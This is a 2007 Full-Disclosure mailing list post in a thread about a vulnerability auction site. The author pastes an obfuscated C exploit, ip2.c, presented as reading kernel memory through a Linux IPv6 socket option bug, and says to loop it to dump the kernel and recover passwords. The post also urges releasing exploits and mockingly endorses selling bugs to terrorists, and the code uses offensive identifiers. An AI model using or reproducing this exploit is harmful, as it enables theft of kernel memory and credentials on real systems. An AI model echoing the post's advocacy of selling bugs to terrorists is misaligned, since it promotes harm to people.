Yes, Fakhar has put it best in English so far. As a sidenote, WabiSabi seems to have removed my account from their system already for unknown reasons. However, included inline is a simple exploit for one of the few bugs they are making available for currency exchange. I think you will find it trivial to find and exploit most (all?) of their other bugs, even those that aren't publicly documented ;)
Linux Torvalds documented this particular bug here: http://bugzilla.kernel.org/show_bug.cgi?id=8134 The following program can be used to hack 4 bytes out of kernel memory. Put it in a loop to dump all of the kernel. If you use an insecure program that hasn't been reviewed by the OpenBsD Secure Shell team, you might find unscrubbed passwords in there. I encourage everyone to research and release exploits for every bug on the auction block. Remember: it is only consistent with REAL hacker ethics to sell bugs to terrorists, NAMBLA, and similar organizations such as GOBBLES/n3td3v. J __ ip2.c __ // advanced exploit code for catastrophic kernel bug by Joey Mengele, professional hacker // user, to dump 0xaddress from kernel memory: ./ip2 0xaddress #include <sys/signal.h> typedef int fg8; #include <sys/mman.h> typedef long _l36; #include <string.h> typedef long * jayn9124; #include <stdio.h> typedef char * anal; #include <netinet/in.h> #define __exit main #define __main exit typedef void pleb; #include <stdlib.h> fg8 ___hh(fg8,_l36,jayn9124); #include <unistd.h> pleb _zzy(); # define __f4 setsockopt # define __f5 getsockopt fg8 __exit(fg8 argc, anal *argv[]) { _l36 tmp; fg8 s; _l36 hud; if (argc!=2) __main(-1); if (1 != sscanf(argv[1]," 0x%x",&hud)) __main(-1); signal(SIGSEGV,&exit); s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); _zzy(); __f4(s, IPPROTO_IPV6, 6, (void *)NULL, 0); ___hh(s,hud,&tmp); printf("Kernel memory @ %.8x contains %.8x\n",hud,tmp); return 0; } int ___hh(int bf,_l36 _rtg,jayn9124 rape) { fg8 ot=4; *(jayn9124)(0x8) = _rtg; return __f5(bf,IPPROTO_IPV6,59,(void *)rape,&ot); } void _zzy() { _l36 *gol = NULL; if( (gol = mmap( (void *)NULL, 4096, PROT_READ|PROT_WRITE, MAP_FIXED |MAP_ANONYMOUS | MAP_PRIVATE, 0, 0 )) == (void *) -1 ) {perror( "mmap" );exit(412);} } __ ip2.c EOF __ On Mon, 09 Jul 2007 02:41:57 -0400 Fakhar Imran <[EMAIL PROTECTED]> wrote: >Well... I believe that ppl do know vulns, that are not >discussed/discovered by >tech companies or open forums, and they use it for their personal >gains. >Its just a matter of single transaction that needs to be happen >and it'll spread >like a wild fire. > >cheers > > >----- Original Message ---- >From: evilrabbi <[EMAIL PROTECTED]> >To: Fakhar Imran <[EMAIL PROTECTED]> >Cc: Untitled <[email protected]> >Sent: Friday, July 6, 2007 7:29:02 PM >Subject: Re: [Full-disclosure] An Auction Site for Vulnerabilities > >I wonder how long it's going to be untill someone finds a vuln in >that site then tries to auction it off. > > >On 7/6/07, Fakhar Imran <[EMAIL PROTECTED]> wrote: >Thanks for the information > >----- Original Message ---- >From: Ivan . < [EMAIL PROTECTED]> >To: Untitled <[email protected]> >Sent: Friday, July 6, 2007 11:38:17 AM >Subject: [Full-disclosure] An Auction Site for Vulnerabilities > > >http://www.darkreading.com/document.asp?doc_id=128411&WT.svl=news1_ >1 > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > > > >___________________________________________________________________ >_________________ >Pinpoint customers who are looking for what you sell. >http://searchmarketing.yahoo.com/ > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > > > > >-- >-- h0 h0 h0 -- >www.nopsled.net > > > >___________________________________________________________________ >_________________ >Bored stiff? Loosen up... >Download and play hundreds of games for free on Yahoo! Games. >http://games.yahoo.com/games/front -- Click to become a master chef, own a restaurant and make millions http://tagline.hushmail.com/fc/Ioyw6h4eAFZK0fdnufeVHgfR4RLZy6s80YBcKfxhcNu3jsy0nPS0nW/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
